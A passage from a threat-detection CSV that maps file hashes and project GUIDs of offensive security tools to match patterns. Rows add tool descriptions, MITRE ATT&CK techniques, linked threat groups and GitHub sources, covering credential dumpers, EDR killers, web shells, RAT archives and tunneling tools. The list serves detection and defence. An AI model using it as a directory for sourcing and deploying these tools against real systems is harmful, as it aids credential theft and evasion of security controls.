LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","31418" "*95ae5c9ab4faf301a44b0c4c0d98d88fd12191667b0f8c78cf933b32df3ff577*",".{0,1000}95ae5c9ab4faf301a44b0c4c0d98d88fd12191667b0f8c78cf933b32df3ff577.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","#filehash","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","31419" "*95b9a6d12b978a6c1bbd6a33369e39008e7d64544d50c98c9c3f2b93a9466e79*",".{0,1000}95b9a6d12b978a6c1bbd6a33369e39008e7d64544d50c98c9c3f2b93a9466e79.{0,1000}","offensive_tool_keyword","PWA-Phishing","Phishing with Progressive Web Apps and UI manipulation","T1071.003 - T1204.002 - T1608.003 - 
T1071.004","TA0006","N/A","N/A","Phishing","https://github.com/mrd0x/PWA-Phishing","1","0","#filehash","N/A","10","3","288","52","2024-06-16T17:47:15Z","2024-06-09T19:47:52Z","31420" "*95BB9D5E-260F-4A70-B0FA-0757A94EF677*",".{0,1000}95BB9D5E\-260F\-4A70\-B0FA\-0757A94EF677.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","31421" "*95BC2C38-1FBE-4AF1-967E-BC133250C4D4*",".{0,1000}95BC2C38\-1FBE\-4AF1\-967E\-BC133250C4D4.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","#GUIDproject","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","31422" "*95bc7379dc7a1f1a8b571ae0ba24937e3d7d5423c3c917a1550dddd0e056e8a9*",".{0,1000}95bc7379dc7a1f1a8b571ae0ba24937e3d7d5423c3c917a1550dddd0e056e8a9.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","31423" "*95cb237e34c83f5922c36da70cf5e0b2e1af5729322da2c45be05c107a0f9ab0*",".{0,1000}95cb237e34c83f5922c36da70cf5e0b2e1af5729322da2c45be05c107a0f9ab0.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31425" "*95ce7bcdf3de537ac2cd09e33663d522dd5156f49a565ff54007d9f70345a1b9*",".{0,1000}95ce7bcdf3de537ac2cd09e33663d522dd5156f49a565ff54007d9f70345a1b9.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","31426" "*95d19ae58bbd6b38b4988fae5c7b514c8451a15e940f1392bcf1f93374364054*",".{0,1000}95d19ae58bbd6b38b4988fae5c7b514c8451a15e940f1392bcf1f93374364054.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","#filehash","N/A","10","3","274","45","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z","31427" "*95d2ea175a231758503f47fa5c3bcbe647327b9deaae76808b6dda647b574ecd*",".{0,1000}95d2ea175a231758503f47fa5c3bcbe647327b9deaae76808b6dda647b574ecd.{0,1000}","offensive_tool_keyword","EarthWorm","SOCKS v5 proxy service used for data forwarding in complex network environments","T1090.002 - T1573.001 - T1095","TA0010 - TA0008 - TA0011","N/A","APT27 - APT15 - Calypso - Earth Lusca - Worok","C2","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","31428" "*95d2ea175a231758503f47fa5c3bcbe647327b9deaae76808b6dda647b574ecd*",".{0,1000}95d2ea175a231758503f47fa5c3bcbe647327b9deaae76808b6dda647b574ecd.{0,1000}","offensive_tool_keyword","EarthWorm","SOCKS v5 proxy service used 
for data forwarding in complex network environments","T1090.002 - T1573.001 - T1095","TA0010 - TA0008 - TA0011","N/A","APT27 - APT15 - Calypso - Earth Lusca - Worok","C2","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","31429" "*95dcf74d21d688a7f2b887af56aeeae19c0d788ed863746f1edf19539a67ad37*",".{0,1000}95dcf74d21d688a7f2b887af56aeeae19c0d788ed863746f1edf19539a67ad37.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","#filehash","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","31431" "*95dd437c805fb71cb3cda5f20ad9b212c44f14dc09194867125acb289af6301b*",".{0,1000}95dd437c805fb71cb3cda5f20ad9b212c44f14dc09194867125acb289af6301b.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","31432" "*95dd52dbd82039a3f19a2bf8b4517b188d27bec4907cfc7f1796b7fa09c68c28*",".{0,1000}95dd52dbd82039a3f19a2bf8b4517b188d27bec4907cfc7f1796b7fa09c68c28.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. 
HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","31433" "*95de28d722e08cb378d1c8d3c5338aa707f43e1f23d5bb03460957d46e80b440*",".{0,1000}95de28d722e08cb378d1c8d3c5338aa707f43e1f23d5bb03460957d46e80b440.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","31434" "*95df94b5f2e9428ee39f9f6706fd746a116a8afe9eeb3b318c576bbb934e35a4*",".{0,1000}95df94b5f2e9428ee39f9f6706fd746a116a8afe9eeb3b318c576bbb934e35a4.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - 
TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","31435" "*95ea0b9f5014787d2743ece13f2800e15e4e24a4c3b2c57576a8cdf49db88c0c*",".{0,1000}95ea0b9f5014787d2743ece13f2800e15e4e24a4c3b2c57576a8cdf49db88c0c.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","31437" "*95f159db9ba6cbe6219d80ce17e7360e5906094333cc595190d683a45d9911f6*",".{0,1000}95f159db9ba6cbe6219d80ce17e7360e5906094333cc595190d683a45d9911f6.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31441" "*95f9539c17bfa24ee0d7206b1fb2b195885b94e82d6bd7276bfccf2f0ceb9ac4*",".{0,1000}95f9539c17bfa24ee0d7206b1fb2b195885b94e82d6bd7276bfccf2f0ceb9ac4.{0,1000}","offensive_tool_keyword","PewPewPew","host a script on a PowerShell webserver, invoke the IEX download cradle to download/execute the target code and post the results back to the server","T1059.001 - T1102 - T1056 - T1071 - T1086 - T1123","TA0011 - TA0010 - TA0005 
- TA0002 - TA0009 - TA0006","N/A","N/A","Credential Access","https://github.com/PowerShellEmpire/PowerTools","1","0","#filehash","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","31444" "*96023f92abefc6b2196bda989320836075a1fa402106fd7cc8fb546bc09502b7*",".{0,1000}96023f92abefc6b2196bda989320836075a1fa402106fd7cc8fb546bc09502b7.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","31445" 
"*96025a3ddc00d070b0ff8d470030b172d8308395dc127f51bdd6de6154abeef4*",".{0,1000}96025a3ddc00d070b0ff8d470030b172d8308395dc127f51bdd6de6154abeef4.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31446" "*96054c7a1c25aacb70e877dbc44a19ba6125e619d78b4c4455945d06a746181f*",".{0,1000}96054c7a1c25aacb70e877dbc44a19ba6125e619d78b4c4455945d06a746181f.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","31447" "*960ad2b1c19c9d10ecd0c64f6aee01d77564ac9e48b76247a217b637c1a6d482*",".{0,1000}960ad2b1c19c9d10ecd0c64f6aee01d77564ac9e48b76247a217b637c1a6d482.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","#filehash","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","31448" "*960d0b51aa95a71cb471e9d217686bf7ac9b548613977d521bd477caa7a5cbf4*",".{0,1000}960d0b51aa95a71cb471e9d217686bf7ac9b548613977d521bd477caa7a5cbf4.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","31449" 
"*961281a6a9502553f68b61f2679a74dfd059fab22328e6f8dcce70c9dbfde0e2*",".{0,1000}961281a6a9502553f68b61f2679a74dfd059fab22328e6f8dcce70c9dbfde0e2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31450" "*9626bcb04c920c611707740eebc798ca86b03ab59480180a747fd739a1e08269*",".{0,1000}9626bcb04c920c611707740eebc798ca86b03ab59480180a747fd739a1e08269.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","31453" "*9629b04d7ab98df29ab630e392f7c15a3a3e050e4156f6ed60eb8aaf206af76e*",".{0,1000}9629b04d7ab98df29ab630e392f7c15a3a3e050e4156f6ed60eb8aaf206af76e.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31454" 
"*962d2a4f2088fbe103c6b38d151689ba100458978ca37a2a9b62047a029f8d33*",".{0,1000}962d2a4f2088fbe103c6b38d151689ba100458978ca37a2a9b62047a029f8d33.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","31455" "*962d6367a3b63dfb6a2db910a70650e218344a5c346beb5b8c4ca29a44d488a9*",".{0,1000}962d6367a3b63dfb6a2db910a70650e218344a5c346beb5b8c4ca29a44d488a9.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#filehash","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","31456" "*963119C10E2DC7140A57BCD3456279C5AB4E9E2A3415F91E93BB5F8D8239D996*",".{0,1000}963119C10E2DC7140A57BCD3456279C5AB4E9E2A3415F91E93BB5F8D8239D996.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","31457" "*9634c75573a4d30c694112af8658cd6cac1c265ac46ff27f20baf6714c1b9428*",".{0,1000}9634c75573a4d30c694112af8658cd6cac1c265ac46ff27f20baf6714c1b9428.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","31459" "*96453b2663149a1019d5585d8a3e67961db6c6c8d43cb76756b14195a839d35e*",".{0,1000}96453b2663149a1019d5585d8a3e67961db6c6c8d43cb76756b14195a839d35e.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","31461" "*964912ef45ddcef3f5dceba80676dbd4463c62fc453d4212021f84adf6e0dca3*",".{0,1000}964912ef45ddcef3f5dceba80676dbd4463c62fc453d4212021f84adf6e0dca3.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","31462" "*96632f716df30af567da00d3624e245d162d0a05ac4b4e7cbadf63f04ca8d3da*",".{0,1000}96632f716df30af567da00d3624e245d162d0a05ac4b4e7cbadf63f04ca8d3da.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - 
Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","31464" "*96632f716df30af567da00d3624e245d162d0a05ac4b4e7cbadf63f04ca8d3da*",".{0,1000}96632f716df30af567da00d3624e245d162d0a05ac4b4e7cbadf63f04ca8d3da.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","31465" "*96644c680528a212dff1c83615d8ca831fc21060c2dd08790bec98e6294576ee*",".{0,1000}96644c680528a212dff1c83615d8ca831fc21060c2dd08790bec98e6294576ee.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. 
Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","31466" "*966526b35beca04fb98c6fe4490a79635ca5bbeef56c21fd118c95ac80ff2ddb*",".{0,1000}966526b35beca04fb98c6fe4490a79635ca5bbeef56c21fd118c95ac80ff2ddb.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","31467" "*9672225f3947d30a1f5c29622c50e8bdc29b749df23450dab7f1ea3ba0f44d5d*",".{0,1000}9672225f3947d30a1f5c29622c50e8bdc29b749df23450dab7f1ea3ba0f44d5d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31468" "*9674DF71-0814-4398-8A77-5A32A8CBE61E*",".{0,1000}9674DF71\-0814\-4398\-8A77\-5A32A8CBE61E.{0,1000}","offensive_tool_keyword","EDRPrison","Leverage a legitimate WFP callout driver to prevent EDR agents from sending telemetry","T1562 - T1027","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/senzee1984/EDRPrison","1","0","#GUIDproject","N/A","10","5","401","37","2024-08-02T18:10:02Z","2024-06-30T01:17:04Z","31469" "*9678bdc0acce5aac06e4154631a01a94bfa9c2455efb5e72c3d8cdbf2663b019*",".{0,1000}9678bdc0acce5aac06e4154631a01a94bfa9c2455efb5e72c3d8cdbf2663b019.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1562.001 - T1569 - T1059","TA0005 - TA0040 - TA0002","N/A","Black Basta - LockBit","Defense 
Evasion","https://github.com/Yaxser/Backstab","1","0","#filehash","N/A","10","10","1435","244","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z","31470" "*967f010c2da33a4f2d610ec3bf7125430367e18d2f83baa18fa2b9172fd990ac*",".{0,1000}967f010c2da33a4f2d610ec3bf7125430367e18d2f83baa18fa2b9172fd990ac.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","31471" "*9680bea8301be835e4f7e35220c4dfbb48ecf51b3fb9d0405c7fa8e8abfab28e*",".{0,1000}9680bea8301be835e4f7e35220c4dfbb48ecf51b3fb9d0405c7fa8e8abfab28e.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","31472" "*9685d4a085acb3880294d902b64562841b163b4949ebab8109a92ff3257abc60*",".{0,1000}9685d4a085acb3880294d902b64562841b163b4949ebab8109a92ff3257abc60.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31474" "*968cd73ac2f46c39aa9fa8fa638b63f6cfe07f23ffd9f39eafd1bef5bc818462*",".{0,1000}968cd73ac2f46c39aa9fa8fa638b63f6cfe07f23ffd9f39eafd1bef5bc818462.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 